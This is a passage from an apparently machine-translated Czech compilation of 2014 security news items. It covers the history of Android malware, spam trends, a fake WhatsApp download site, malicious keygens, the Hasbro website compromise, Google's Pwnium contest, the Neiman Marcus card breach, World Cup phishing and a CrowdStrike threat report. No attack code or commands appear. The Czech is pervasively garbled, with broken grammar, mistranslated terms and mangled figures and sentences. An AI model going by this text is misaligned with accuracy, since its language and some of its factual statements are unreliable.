malware odvozené od PC malware. Zitmo, Zeus v Mobile, byl první známý prodloužení Zeus, vysoce virulentní bankovnictví Trojan byl vyvinut pro PC světě. Práce ve spojení s Diem, Zitmo je hybnou silou, zločinci, aby se vyhnula používání SMS zpráv v on-line bankovních transakcí, a tím k obcházení zabezpečení procesu. Tam byl jiný malware v titulcích i v letošním roce, především Geinimi. Geinimi byl jedním z prvních malware navržen tak, aby útok na platformu Android a pomocí infikovaných telefon jako součást mobilní botnet. Po instalaci do telefonu, to by komunikovat se vzdáleným serverem a reagovat na širokou škálu příkazů - např. instalací nebo odinstalováním aplikací -. Který umožnil, aby efektivně převzít kontrolu nad telefonem "Zatímco zavedení mobilního malwaru pro Android a mobilní botnety byly jistě významné události v průběhu roku 2010, byly zastíněny rostoucí přítomností organizovaných zločinci, kteří začali využívat ekonomickou hodnotu mobilní malware, "řekl Apvrille. 2011: Android, Android a ještě Android s útoky na Android platformy zintenzivnění, silnější malware se začaly objevovat v roce 2011. DroidKungFu, například, se objevil s několika unikátními vlastnostmi, a dokonce i dnes je považován za jeden z nejvíce technologicky vyspělých virů v existenci. Malware včetně dobře-známý využít na "root" nebo se stát správcem telefonu - udev nebo Rage Against The Cage - což je úplnou kontrolu zařízení a schopnost kontaktovat příkazový serveru. To byl také schopný se vyhnout detekci anti-virus software, první bitva v probíhající válce mezi zločinci a anti-virus vývojářské komunity. Stejně jako u většiny virů před tím, DroidKungFu byl obecně dostupné od neoficiálních app obchodech a na fórech třetí strany v Číně. Plankton také přišel na scénu v roce 2011 a je stále jedním z nejrozšířenějších Android malware. Dokonce i na Google Play, oficiální Android apps store, Plankton se objeví ve velkém množství aplikací jako agresivní verze adware, stahování nevyžádané reklamy na telefonu, mění domovskou stránku mobilního prohlížeče nebo přidání zprávy zkratky a záložky na mobilní uživatele telefon. "S planktonu, budeme nyní hrát v první lize! Plankton je jedním z top 10 nejčastějších virů v rámci všech kategorií tím, že by ve stejné lize jako top PC viry, "dodal Apvrille. "Dny mobilní malware, které zaostávají za svými PC protějšky, jsou pryč. V současné době existuje více než 5 milionů zařízení infikovaných Plankton sám. " 2013: Hra na - nových způsobů útoku 2013 znamenal příchod FakeDefend, první ransomware pro Android mobilní telefony. V přestrojení jako antivirus, tento malware funguje podobným způsobem jako na falešný antivirus na počítači. Zaklapne telefon a vyžaduje, aby oběť zaplatit výkupné (ve formě přehnaně vysoké antivirovým paušálního poplatku, v tomto případě), aby bylo možné načíst obsah zařízení. Nicméně, platit výkupné nijak opravit telefon, který je třeba resetovat do továrního nastavení, aby se obnovila funkčnost. To bylo také v roce 2013, že Chuli poprvé objevil. Chuli malware byl považován za první cílený útok na platformě Android. Počítačoví zločinci za útokem zadlužuje e-mailový účet a aktivista na Světové ujgurské konference, která se konala March 11-13, 2013 v Ženevě, zaměřit se na účty jiných tibetského aktivisté za lidská práva a obhájci. E-maily odeslané z pirát účtu včetně CHULI jako přílohu, kus malware určený ke sběru dat, jako jsou příchozí SMS, SIM karty a telefonu kontakty, informace o umístění a nahrávky telefonních hovorů obětí. Zachycená informace pak byly odeslány na vzdálený server. "2013 je možno považovat rok mobilních útoky" profesionálem, "řekl Apvrille. "Stále více cílené a sofistikované, malware, jako FakeDefend nebo Chuli jsou příklady útoků srovnatelné známe dnes v PC světě. Kromě toho, že je to naprosto rozumné se zeptat, zda útok jako Chuli je ohlašovat nás do éry mobilních kybernetické války a začátek potenciálních postižením s vládami a dalšími národními organizacemi. " Co bude dál? Díky počítačové trestné činnosti, je vždy obtížné předpovědět, co se bude dít příští rok, a ještě více tak v průběhu příštích 10 let. Krajina mobilních hrozeb se dramaticky změnila v posledních deseti letech a cybercriminal komunita stále najít nové a stále důmyslné způsoby použití těchto útoků pro jeden jediný účel -. Vydělávání peněz však, s explozí chytrých telefonů a dalších mobilních technologií, přiměřené Predikce je konvergence mobilních a PC malware. Jako všechno, co se stane "mobilní", všechny malware pak bude "mobile". Kromě mobilních zařízení, s největší pravděpodobností budoucí cíl pro zločinci je internet věcí (internetu věcí). Zatímco velmi obtížné odhadnout počet připojených objektů na trhu v příštích pěti letech, Gartner odhaduje 30 miliard objekty budou připojeny v roce 2020, zatímco IDC odhaduje, že trh je 212000000000. Stále více a více výrobců a poskytovatelů služeb se vydělávat na obchodní příležitosti předložila těchto objektů, ale to je rozumné předpokládat, že bezpečnost nebyla dosud vzata v úvahu v procesu vývoje nových produktů. Bude internetu věcí bude "The Next Big Thing" pro cybercriminal?


Finanční údaje vede nebezpečný spam hit seznam
2.2.2014 Bezpečnost
Podíl nevyžádané pošty v e-mailovém provozu nadále klesá - v posledních třech letech se podíl nevyžádaných zpráv klesla o 10,7 procentních bodů. Zdá se, že inzerenti stále dávají přednost různé druhy zákonné on-line reklamy, které jsou nyní k dispozici a které generují vyšší odezvy při nižších nákladech než spam může nabídnout.

Kriminalizace spamu

V některých spam kategoriích reklamní se postupně odsunut trestné zásilek, jako jsou spamy reklamní nelegální zboží nebo pornografii. Typickým příkladem je Cestování a cestovní ruch kategorie, která slouží k účtu na 5-10% veškeré nevyžádané pošty provozu. V těchto dnech, komerční reklamy tohoto typu jsou vzácné, ale odborníci vidět mnoho škodlivých e-mailů aktivně využívat předmět cestování a volný čas. Falešné zprávy antivirus dodavatelů To je obyčejné pro IT bezpečnostní odborníci doporučují, aby uživatelé pravidelně aktualizovat své antivirové řešení, a to je něco, co se zločinci snažili využít v roce 2013. V e-maily, které se zdají být zaslány známých antivirových výrobců, jako jsou společnosti Kaspersky Lab, McAfee, ESET, Symantec atd., které vyzval uživatele, aby aktualizovali své systémy okamžitě pomocí přiloženého souboru. Příloha Ukázalo se, že obsahuje trojského koně z nechvalně proslulé Zeus / Zbot rodiny, který je navržen tak, aby krást citlivá uživatelská data, zejména finanční informace. Darya Gudkova, vedoucí obsahové analýzy na společnost Kaspersky Lab, poznamenal: "Již třetí rok v řadě nejrozšířenější malware šíří prostřednictvím e-mailu jsou programy, které se pokusily ukrást důvěrné údaje, obvykle přihlašovací jména a hesla pro internetové bankovnictví. Současně, nicméně, phishing útoky přesouvají z bankovních účtů na sociálních sítích a e-mailu. To lze částečně vysvětlit tím, že dnešní e-mailové účty často poskytnout přístup k hodně obsahu, včetně e-mailu, sociálních sítí, instant messaging, cloud skladování a někdy dokonce i kreditní kartou ". "šedý" korespondenci: obcházet spamové filtry V Nabídka pro dosažení ještě větší počet uživatelů, ale pozor na spam filtry, které blokují nežádoucí zprávy, inzerenti se uchylují k podvodu. Část hromadnou korespondenci je zaslána účastníkům, kteří souhlasili přijímat reklamy, a část je poslán na adresy získané z obrovských databází tyto společnosti si koupili -. Lidem, kteří nikdy dali svůj souhlas, aby takové zprávy dostávat Pokud jsou zásilky blokovány spam filtry, inzerenti obraťte se na dodavatele bezpečnostní a snaží se dokázat, jejich korespondence jsou legitimní tím, že ukazuje na webové stránky, kde uživatelé se zaregistrovat a můžete odhlásit kdykoliv. Toto představuje novou výzvu pro anti-spam průmyslu a vede k vývoji nových technologií založených na odesílatele pověst. Kde je spam pocházejících z? Asie představovaly 55,5% světové spamu v roce 2013 (nárůst o 5,3 procentního bodu v porovnání až 2012), po němž následuje Severní Amerika s 19% (+ 3,2 bodu). Podíl ve východní Evropě téměř zdvojnásobil ve srovnání s předchozím rokem, umístění regionu na třetím místě s 13,3%. Západní Evropa zůstává na čtvrtém místě, a to i přes pokles o 2,4 procentních bodů, zatímco podíl Latinské Ameriky na pátém místě činil k trojnásobnému poklesu oproti roku 2012.


Falešnou WhatsApp místo doručuje polymorfní SMS Trojan
2.2.2014 Mobil | Viry
Více populární on-line služba nebo aplikace je, tím větší je pravděpodobnost tato popularita bude zneužita cyber podvodníci oklamat uživatele do stahování malware či sdílení osobních a finančních informací. Rostoucí popularita služby instant messaging WhatsApp je dokonalým příkladem, jak počítačoví zločinci po celém na světě se neustále zřídit systémy zneužití služba je dobré postavení. Nejnovějším příkladem, všiml výzkumníky Malwarebytes ', přichází v podobě webové stránky nabízející aplikace pro rusky mluvící uživatele.

Tato stránka je spoof oficiálních stránkách dané služby, a vypadá docela přesvědčivý. Je to zřejmě nabízí verze aplikace pro iOS, Android, Nokia, Windows Phone a BlackBerry. V tomto případě pouze uživatelé s zařízení se systémem Android jsou v ohrožení, protože nabízené aplikace je vlastně Android SMS Trojan. Po instalaci na zařízení, malware začne vysílat pricy textové zprávy na číslo pojistné sazby. "Trojan sám byl asi na chvíli, ale malware autoři servírují polymorfní soubory, které se mění s každou návštěvou," poznamenal vědci . "Změny zahrnují řetězce, jako je třídách název balíčku a java. Celková kód a datový tok zůstává stejný. Tato taktika není nutně zaměřen na uživatele, ale vyhnout se detekci AV dodavatelů.


Dejte si pozor na škodlivé specializovaných softwarových keygeny!
2.2.2014 Viry
Maškarádu malware jako klíčové generátory populárních her ​​je dobře známý malware, dodávka taktika, ale není to často, že vidíte škodlivé keygens pro jiné typy softwaru. Nicméně, to se stává občas. Výzkumníci Trend Micro varuje, že v posledních několika týdnech, malware trhovců byly zaměřené odborníky, kteří pracují v různých průmyslových odvětvích s tímto přístupem. Oni našli falešné generátory pro specializované (a drahé), strojírenství (AVEVA) a opravy automobilů softwaru (AllData), multimediální nástroje (Bigasoft), benchmarking software (Geekbench), software pro chemiky a biology (CambridgeSoft), výpočetní software (Wolfram Mathematica), a, ano, některé hry. Bohužel, nabízené spustitelné soubory nejsou tím, čím se zdají být. Jakmile se nainstalují, připraví cestu pro další škodlivý software, který bude instalován na ohrožení počítače, a v poslední době, že software je často falešný AV varianta. "Fake antivirový software, který výrazně snížil z jeho rozkvětu před několika lety (částečně kvůli zásahy na jejich platební systémy), "výzkumníci zdůraznil . "Od té doby, to bylo zastíněno první policejní ransomware a pak ve více nedávných měsících od CryptoLocker.


Webové stránky Hasbro ohrožena, slouží malware
2.2.2014 Viry
Oficiální internetové stránky dobře-známý výrobce hraček Hasbro byl kompromitován a našel slouží malware na nic netušící návštěvníky na několika příležitostech během posledních několika týdnů. Podle Barracuda Labs výzkumné pracovníky, místo nebylo ohroženo přes škodlivé reklamy, jak je to často případ , ale přímo, a to povede návštěvníky přes řetězce přesměrování na webové stránky hosting Java využije. Pokud je počítač návštěvníka se ukázalo být náchylné k nim, download informačního krádež Trojan varianta, která byla zpočátku není detekován některý z AV řešení používané VirusTotal. Uživatelé, kteří navštívili stránky 10. ledna, 11, 14 a 20 pravděpodobně měl jejich počítače infikované, tak oni jsou vyzýváni, aby skenovat svůj stroj s jedním z AV řešení, která detekují malware v otázce . , ale aby se na bezpečné straně, každý, kdo navštívil stránky v poslední době by to dobře, aby tak učinily také. Vyhnout webové stránky v současné době může také není špatný nápad, jak jsme čekat na své operátory čistý dům.


Rozvojové země jsou více ochotni obchodovat soukromí pro bezpečnost
2.2.2014 Bezpečnost

Společnost Microsoft zveřejnila výsledky globálního průzkumu, který se pokusil odpovědět na otázku, jak se lidé na celém světě vidět technologii a jak osobní technologie změnila jejich životy. Zatímco tam jsou rozdílné názory mezi rozvinutým a rozvojovým světem, drtivá většina z více než 10000 dotazované osoby z 10 zemí uvedlo, že přijali osobní technologie, zejména na rozvíjejících se trzích, a vidět jej jako základ inovací a ekonomického postavení. Lidé dotazovaní v rozvojových zemích - zejména Brazílie, Rusko, Indie a Čína - se domnívají, že osobní technologie je vytvoření pracovních příležitostí a pomáhá most ekonomických rozdílů. Lidé v Číně také říci, že osobní technologie pozitivně ovlivněn osobní svobody více než lidé v jakékoliv jiné zkoumané zemi. Lidé v Indii říkají, že osobní technologie je zlepšení vzdělávání, zdravotnictví a zdravotní péče, a v Brazílii, osobní technologie, měl silný vliv na umění a kulturu. Ačkoli osobní Technologie byla viděna převážně jako pozitivní síly v rozvinutých i rozvojových zemích, tam byly obavy , která se zaměřila na osobní bezpečnost a bezpečnost, rodinných vazeb, a, co je nejdůležitější, soukromí. Zajímavé je, že průzkum zjistil, že rozvojové země jsou ochotny obchodovat soukromí pro bezpečnost. Indii, a to zejména, vidí národní bezpečnosti jako důležitější, že soukromí. Na druhém konci spektra, téměř 70 procent dotázaných německých uživatelů uvedlo, že by neměl obchodovat soukromí pro národní bezpečnost (klikněte na screenshotu pro zvětšení): I přes obavy o soukromí, nicméně, téměř tři čtvrtiny Rodiče po celém světě chtějí, aby jejich děti měly více, ne méně, přístup k osobním technologií. To platí zejména v rozvojových zemích, kde jsou rodiče především podporovat zvýšení přístupu k technologiím. Názory jsou smíšené v rozvinutých zemích, kde je více rodiče mají pocit, že by mělo být omezení přístupu technologie. Průzkum Microsoft byl proveden mezi 26 prosincem 2013, a 03.1.2014, a zkoumal 10.009 uživatelů internetu ve Spojených státech, Francii, Brazílii, Rusku, Číně, Indii, Japonsku, Německu, Mexiku a Turecku. Výsledky pak byly váženy na základě velikosti populace internetu v každé ze 10 zemí. Pro ​​zjištění úplné šetření jít sem .


2700000dolar čekají úspěšné Pwnium 4 soutěžící
2.2.2014 IT
Google má opět tzv. bezpečnostních výzkumníků k účasti ve své výroční Pwnium soutěže naplánováno která se bude konat v CanSecWest bezpečnostní konferenci ve Vancouveru v polovině března.

Čtvrtý ročník hackerské soutěže bude stejně jako v loňském roce, se zaměřují na společnosti Chrome OS, a soutěžící budou bojovat o značných ceny. Soutěžící, kteří dokáží spustit prohlížeč nebo systém na úrovni kompromisu v hodnocení režimu nebo jako přihlášený uživatel , dodáno prostřednictvím webové stránky, vyhraje 110.000 dolar, a ti, kteří nesou náš kompromis s zařízení vytrvalosti ("trvalé Host-to-Host využívat" s prozatímní restartu, dodáno prostřednictvím webové stránky), získají v pohodě 150.000 dolarů. prize poolu je 2718280 dolarů celkem. "Novinkou letošního ročníku, budeme také uvažovat o významné bonusy k prokázání zvláště působivé a překvapivé využívat. Možné příklady zahrnují porazil kASLR, využívání poškození paměti v 64bitovém procesu prohlížeče, případně využívání jádra přímo od renderer proces, " vysvětlil Jorge Lucángeli Obes, bezpečnostní Google inženýr a Pwnium Ceremoniář. "Past Pwnium soutěžích se zaměřuje na Intel Chrome OS zařízení, ale letos vědci si mohou vybrat mezi ARM-based Chromebook, HP Chromebook 11 (WiFi ), nebo Acer C720 Chromebook (2GB WiFi), který je založen na Intel Haswell mikroarchitektuře. útok musí být prokázána proti jednomu z těchto zařízení se systémem pak-aktuální stabilní verzi Chrome OS. " Jako obvykle, vyhrát cenu, že bude muset dodat plné využití s důkladným vysvětlením o využívaných chyby. Veškerý software je součástí výchozí instalace může být použit jako součást útoku. Vědci přemýšlel o registraci musí do 10.03.2014 se rozhodnout. Pro ​​více informací, podívejte se na oficiální pravidla pro soutěže


1,1 milionu postižených v Neiman Marcus porušení
2.2.2014 Incidenty

American store luxusní Oddělení řetězec Neiman Marcus konečně nabídl nějaké podrobnosti o porušení utrpělo během konce roku dovolenou. Není to tak zlé, jako Target porušení , ale je to špatné, nicméně.

"Zatímco soudní a trestní vyšetřování stále pokračují, víme, že škodlivý software (malware) byl tajně nainstalován na našem systému," uvedl generální ředitel společnosti Karen Katz. "Zdá se, že malware se aktivně pokoušel sbírat nebo" šrot "Údaje o platebních karet z 16.července 2013 do 30.října 2013. Během těchto měsíců, přibližně 1,1 milionu platebních karet zákazníků by mohla být potenciálně viditelná malware. K dnešnímu dni, Visa, MasterCard a Discover oznámily nám, že přibližně 2400 unikátních platební zákazník karet používaných v Neiman Marcus a Poslední obchody volání byly následně použity podvodu. " Společnost začala oznámením potenciálně postiženým zákazníkům, pro něž se mají adresy nebo e-mail, a kdo nakupoval s nimi mezi lednem 2013 a ledna 2014 a nabízí jeden volný rok úvěrového monitoringu a ochrany identity proti krádeži. Oni také vyzval své zákazníky na kontrolovat jejich výpisy z platebních karet pro podezřelé aktivity, a ujistil je, že pokud jsou hlášeny včas, budou společnosti vydávající kreditní karty uhradit peníze, které ztratili. Udělali Ujistěte se, že vědomí, že zákazníci, kteří nakupovali on-line don 't se zdají být ovlivněny, a že PINy, čísla sociálního pojištění a data narození nebyly ohroženy. nenasvědčuje tomu, že by společnost mohla utrpěli porušení přišel v polovině prosince, kdy se jejich obchodní procesor oznámeného jim neoprávněné činnosti platebních karet Následující zákazník nakoupí v jednom ze svých obchodů. porušují byla potvrzena 1. ledna, forenzní firmy, které najal. "Na základě informací, které máme k dnešnímu dni se zdá, že sofistikované, self-skrývání malware, který je schopen podvodně získat informace o platební kartě , byl aktivní v období mezi červencem 16 a 30 října 2013, "uvedli, ale řekl, že nejsou známy žádné spojení mezi jejich a Target porušení (ačkoli jiné zdroje říkají, že malware používá v obou porušení se zdá být stejná ). Nakonec dodal, že oni přijali řadu kroků, které obsahují situaci a ke zlepšení jejich bezpečnostních opatření.


Evropská komise spojí své síly s firmami, pro 250.000 školení a nových digitálních pracovních míst
2.2.2014 IT
Předseda Evropské komise José Manuel Barroso a viceprezident Neelie Kroes přinesl generálních ředitelů z celé globální ekonomiky spolu na Světovém ekonomickém fóru v Davosu dnes rozšířit úspěšný rok-staré koalici, která se bude vyznačovat digitální možnosti vzdělávání a pracovních příležitostí.

Davos prohlášení, které bylo dnes řečeno, předpokládá vytvoření 100 tisíc dalších stáží do konce roku 2015. Od března 2013 42 partnerských organizací byly vyplněny extra 2200 nových digitálních pracovních míst, 5277 další stáže a učňovské obory a dodává školení pro další 269.000 lidí, kteří splňují závazky, které učinily na velké koalice EU pro digitální zaměstnanost. Partneři patří Cisco, Google, Microsoft, Oracle, Samsung, SAP, Telefonica, a řadu průmyslu a občanské společnosti sdružení. Klíčovým cílem v 2014 rozšíření koalice bude zboží a maloobchodní odvětví, které se stále více závislé na pracovníky s . digitální dovednosti, a to i na obchod a továrních Předseda Komise Barroso uvedl: "Velká koalice pro digitální zaměstnanost využívá úspor z rozsahu, které máme na úrovni EU, aby kvalifikované lidi a inovativní zaměstnavatele dohromady. To je evropská integrace v praxi. . Apeluji na všechny ty, kteří dosud spojil, aby využily této příležitosti k pomoci Evropa řídit další revoluci informačních a komunikačních technologií " prohlásila místopředsedkyně Neelie Kroesová k tomu: "Potkávám tolik mladých lidí s iniciativou, kteří touží po příležitosti a vidím. . společnosti v zoufalé potřebě pracovníků s digitálními dovednostmi Koalice odpovídá dva spolu, a pomáhá tisícům lidí budovat své životy Změna život stojí za každou minutu a euro investované ".. Příklady:

11 grassroots koalice složené z místních samospráv, místní průmysl, služby zaměstnanosti, vzdělávací a sociální subjekty jsou ve vývoji. Národní koalice již byly zahájeny v Litvě, Rumunsku a Polsku a iniciativy probíhají v Rakousku, Bulharsku, Itálii, Řecku, Lotyšsku, Španělsku, Amsterdam metropolitní oblasti, a v Baskicku
Dva Masivní Otevřené On-line kurzy (MOOCs) pro vědu a technologie učitelů středních škol jsou nyní k dispozici zde
Microsoft zvýší počet stáží o 50% v průběhu tří let (dosažení 13,500 v roce 2013 - 2015
Rada evropských Profesionální informatiky společností (CEPIS) zahájila e-Competence Benchmark, nástroj k tomu, aby uchazečům o zaměstnání a zaměstnavateli, aby odpovídal své dovednosti proti tomu, co zaměstnavatelé hledají v cestě zaměstnavatelů hodit
University of Piraeus v Řecku vyvíjí one-stop-shop zmapovat potřeby průmyslových podniků, poskytují on-line kurzy (200 lidí vyškoleni tak daleko), a nabídku dohazování služby pro stážisty
V Bulharsku, Telerik Akademie vyškolila více než 7000 lidí, přes MOOCs
V Itálii, Didasca, Banda Larga e Menti akutní, vyškolil 3000 lidí a 1100 učitelů v lepších dovedností v oblasti IKT
YouRock se crowdfunded novou zaměstnatelnosti platformu pro mladé lidi v celé Evropě využívat své stávající činnosti pro vytváření obsahu on-line jako důkaz své skryté schopnosti a nadání.


Světový pohár: falešné vstupenky, falešné dárky, skutečné útoky
31.1.2014 Phishing | Viry

Bouře phishing a malware útoky s využitím téma Světového poháru pokračuje - před několika měsíci jsme zaznamenali několik škodlivých kampaní s tímto tématem. Pro zpestření útoky a přilákat více obětí, brazilské zločinci se rozhodli investovat své úsilí o šíření falešné dárky a podvodné webové stránky prodávající vstupenky na hry na velmi nízké ceny, jízdenky, které ve skutečnosti neexistují.

Útoky spustí, když uživatel dělá jednoduché vyhledávání na Google, hledá pro webové stránky, které prodávají vstupenky Světového poháru. Zlí hoši registrované podvodné domény fifabr.com , které se zobrazí mezi prvními výsledky jako sponzorovaný odkaz:

Podvodné webové stránky nabízejí vstupenky na brazilských her za cenu 70,00 dolarů:

Produkty Kaspersky blokuje několik podvodných domén denně, všechny z nich používáte téma Světového poháru. Takové útoky jsou zaměřeny zcela na brazilských uživatelů a zprávy obecně používají názvy místní kreditní karty, banky a velké obchody, atd.

Phishingových zpráv s podvodným dárky jsou stále běžné, stejně - některé nabízejí volné vstupenky, hotovost, nebo dokonce zdarma cestování:


"Gratuluji, jsi vítěz volnou vstupenku na mistrovství světa"

Chcete-li získat volnou vstupenku, že je nutné, aby všechny vaše osobní údaje a číslo své kreditní karty na podvodné webové stránky:

Neymar a Fuleco čekají na vaše data kreditní karty

Někteří protivníci mají také vytvořil falešný prozradí, že je platný i po hrách:

"Dáváme ceny po mistrovství světa" jen další podvodnou domény

Až do začátku her mnoho dalších útoků se mohou objevit - ale my jsme připraveni je blokovat. Neriskujte snaží koupit vstupenky na hry na neznámých místech - to je bezpečnější koupit na internetových stránkách FIFA , bude on-line prodej začíná 12. března 2014.


Black Gold, nebo černá díra v kapse
31.1.2014 Spam

Michail Chodorkovskij, bývalý šéf ruské ropné společnosti Jukos, byl nedávno propuštěn z vězení. Tam je spousta spekulací v Rusku, pokud jde o důvody pro jeho amnestie, zatímco bulvár po celém světě sledují ex-podnikatel na každém kroku. Pro "nigerijské" podvodníky, novinky byl použit jako základ pro příběh o tragédii, jehož jediným cílem je vytlačit peníze z důvěřivých uživatelů.

Podle "nigerijské" příběhu, celá skupina ruských ropných magnátů (nadsázka, která má ospravedlnit obrovskou sumu peněz uvedenou v příběhu) čelí soud na základě obvinění podvodu. Naštěstí pro příjemce, měli čas převést svůj majetek na svěřenecký účet u banky ve Velké Británii. A teď tajemný prostředníkem, pane Maharais zahanbit, žádá lidi, aby osobní bankovní účet, $ 50 milionů olej štěstí by mohla být převedena do. Samozřejmě, že záležitost je přísně důvěrné - Velká Británie a ruští úředníci by měli vědět o tom nic.

Propuštění Chodorkovského z vězení vyvolalo vlnu tvůrčí podvody ze strany těchto spisovatelů 'Nigerijci písmen "- tam může být žádné jiné vysvětlení pro tvrzení, že celá skupina ropných magnátů (spíše než jen jedna osoba), byla pravděpodobně vzhledem k 15-věta roku . Naštěstí, to usnadňuje rozpoznat podvod. Jednoduchý on-line vyhledávání bude rychle odhalí, že tam byly žádné masové zatýkání ruských oligarchů, a to $ 50 milionů je jen výplodem pana Maharais zahanbit fantazie - pokud vůbec, že ​​vůbec existuje.


Olympijské hry: Made in China
31.1.2014 Spam

Čína je tradičně hlavním zdrojem spamu na světě, a dopisy od mnoha čínských výrobců, kteří produkují obrovské množství zboží, jsou neustále přítomny v spam provozu. V naší zprávě říjnu jsme se zmínili, že tyto zásilky jsou obvykle spojeny nějakým způsobem z nejpopulárnějších mezinárodních svátků. A když viděl, leden nemá opravdu žádné významné nejen mluvit, spammeři se obrátil na jiné významné události - nadcházející zimní olympijské hry v Soči. Například, některé sklad společnosti propaguje své služby tím, že řekne příjemce, že jejich služby jsou využívány Ruskem v rámci přípravy na Soči 2014 her.

V září 2013 Jacques Rogge oznámil, že Tokio bude hostit olympijské hry 2020. Zatímco Japonsko se slaví své vítězství, někteří rychle myslící čínští výrobci z průmyslu výroby silikonů vymyslel způsob, jak využívat zprávy k propagaci svých výrobků. Ve svých nevyžádaných zpráv, které blahopřál japonské občany a připojil pár fotek z vyhlášení obřadu v Buenos Aires. Oni podepsal svůj dopis tím, že nabízí produkovat celou řadu olympijských themed zboží.

Spammeři využívají mnoho různých triků, jak přilákat nové zákazníky, ale spolupracují s podniky, jako je tento, je vždycky riskantní. Nenechte se zmást tím, sliby, nebo odkazy na velkých jmen a událostí - žádný z těchto záruk bude skutečně dostávají kvalitní zboží nebo služby. Ve skutečnosti, že společnosti mohou dokonce ukázat, že podvody a zmizí beze stopy poté, co obdržela zálohovou platbu.


Většina zaměstnanců SMB ve strachu z krádeže identity na pracovišti
31.1.2014 Bezpečnost

Menší obchodní pracoviště se promění v mobilní povoleno, agilní, a uspokojující životní prostředí, ale jeden, kde pracovní síla je plně uvědomuje a obavy o ohrožení jejich osobních informací on-line, nezávislá studie, financovaná GFI Software odhalil. Slepý průzkum dotázaných 1119 respondentů, kteří pracují v organizacích se mezi dvěma a 99 zaměstnanců na všech aspektech práce v malých a středních podniků (SMB), z pracovní spokojenosti a názorů na vedení do stavu malé firmy IT poskytování a využívání sociálních médií. Studie zjistila, že zdravé 81% zaměstnanců SMB dotazovaných jsou spokojeni se svou prací celkově. Nicméně, i přes výše průměrné úrovně práce štěstí, stejné zaměstnanci také zaznamenal značné obavy z dopadů on-line zpracování má na své osobní bezpečnosti a bezpečnosti informací. Téměř šest z 10 respondentů (59%) uvedla, pokud by mohly snap prsty a odstraňte všechny své osobní informace z internetu, že by s odvoláním na obavy z krádeže identity jako primární motiv. Celkem 87% dotázaných přiznala, že se cítil v nebezpečí, že se stanou obětí krádeže identity nebo jiné trestné činnosti, při použití práce počítačových systémů a zařízení, které obsahuje 6%, který naleznete v části "velké" rizika a 37%, kteří vnímají "některé "riziko. Mezi pracovníky na malé a střední podniky, které mají IT podporu na zaměstnance nebo na smlouvy, pouze 53% uvedlo, že jejich společnost zdokumentovány zásady, kterými se řídí používání firemních vlastnictví IT zařízení a / ​​nebo používání počítačů na pracovišti. Ještě více překvapující, 24%, kteří mají zdokumentovány zásady v místě přijaty k jejich porušení, což bude dalším obavám z bezpečnosti IT a bezpečnosti pro všechny zaměstnance. studie GFI také odhalila, že navzdory mnoha menších organizací, agresivně, kterými se přijímají technologií, nástrojů a pracovních postupů svých větších rivalů, 75% dotázaných věří, mobilní výpočetní techniky se zlepšila jejich rovnováhu mezi pracovním a / život a pomohl pracovní síla jejich organsation stávají pružnější, na rozdíl od 25%, který řekl, že učinil život více stresující, protože to prodlužuje délku pracovní . den a odstraňuje propast mezi prací a osobním času Další zjištění z této zprávy jsou:

Téměř všichni respondenti se zaměstnavatelem ve vlastnictví mobilních výpočetních zařízení uvedlo, že používat na věci, které se netýkají práce, 22% uvedlo, že tomu tak často, 38% občas a 30% zřídka
37% zaměstnanců malých podniků uvedlo, že používají Facebook alespoň jednou denně
7% přiznalo, že se v určitém okamžiku ztratil mobilní výpočetní zařízení, která obsahovala údaje o společnosti
Pouze 36% respondentů uvedlo, že počítače jejich zaměstnavatele jsou nastaveny tak, aby jim blokovat návštěvě určité webové stránky.


Hacker Guccifer zatčen v Rumunsku?
31.1.2014 Kriminalita

Rumunský člověk věřil, že je (v) slavný hacker Guccifer byl zatčen ředitelství rumunského pro vyšetřování organizovaného zločinu a terorismu (DIICOT) ve středu.

Tisková zpráva ( pomocí Google Translate ) vydaného agenturou v důsledku zatčení uvedeny pouze iniciály zadržené muže - LML - ale říkal, že on byl podezřelý z opakovaně a bez povolení má přístup k e-mailové účty, které patří do veřejného života v Rumunsku , přístup k důvěrné e-maily a přenést je do svého počítače, pak se změnil hesla účtů. On také byl obviněn z prozrazení některých to shromážděny informace pro veřejnost, aby k poškození dobrého jména dotčených osob. náznak, že muž v otázce může být "Guccifer" spočívá v tvrzení, že americké úřady pomohl při vyšetřování. Jak si možná vzpomínáte, Guccifer se cílené on-line účty, mimo jiné, na šéfa amerického Národním úřadem pro jadernou bezpečnost , se Bush rodinu a Sex autor Město Candace Bushnell . Tisková zpráva také uvádí, že zatčený muž byl dříve zatčen za podobné trestné činy. rumunský novinky výstup Gandul.info ( via Google Translate ) se vykopali více informací o zatčen člověk, jmenoval jej jako jeden Marcel Lazarus Lehel. Soudě podle popisu jeho modus operandi v jeho 2011 útoků, policie Zdá se, že se dostali do pravého muže.


Motivace a techniky světově nejvíce sofistikovaných kybernetických útočníků
31.1.2014 Kriminalita

CrowdStrike vydala "CrowdStrike Globální hrozby Zpráva: 2013 Rok v přehledu," produkt jeho celoročního studia o více než 50 skupin aktérů počítačové hrozby.

Stránka zpráva 30-plus nabízí pohled na činnosti několika sofistikovaných skupin útočníků, včetně:
Deadeye JACKAL, obyčejně známý jako syrské elektronické armády (SEA);
Číslované Panda, skupinu Čína na bázi útočníků, kteří prováděli řadu kopí phishingových útoků v roce 2013;
MAGIC kotě, založena skupina kybernetických útočníků se sídlem v Íránu, který se provádí na několika kampaních v roce 2013, včetně série útoků zaměřených politických disidentů a těmi, kdo podporují íránskou politickou opozici;
ENERGETICKÁ BEAR, skupina rusko-založená společnost, která shromažďuje zpravodajské informace o energetice a
Vyslanec PANDA, herec Čína-založená společnost, která se zaměřuje na zahraniční velvyslanectví shromažďovat údaje o vládních, obrany a technologických odvětvích.
Nabízí také podívat na některé z nejpopulárnějších taktiky a techniky pro porušení obranu cílené organizace těchto útočníků. Například zpráva nabízí podrobnou analýzu toho, jak se několik organizovaných skupin hrozeb pomocí strategického web kompromis (SWC) - někdy tzv. "zalévání díry" - proniknout do cíle tím, že nakazí webové stránky nejčastěji surfovali svých členů. . SWC útoky na Radu pro zahraniční vztahy, amerického ministerstva práce, a několik zahraničních velvyslanectví jsou podrobně popsány ve zprávě "Organizace potřebují, aby se zpravodajskou řízený přístup k bezpečnosti - aktivně responding až po pokročilé hrozby podle priorit své omezené zdroje, "řekl George Kurtz, výkonný ředitel / prezident a spoluzakladatel CrowdStrike. "Informace v této zprávě umožňuje bezpečnostním profesionálům rozlišovat mezi cílenými a komodit útoků, čímž se šetří čas a zaměřit se na nejkritičtější ohrožení podniku." "S touto zprávou, jdeme nad rámec tradiční" zprávy o ohrožení " že prostě analyzuje malware trendy, "řekl Dmitrij Alperovitch, spoluzakladatel a CTO CrowdStrike. "Tato zpráva se 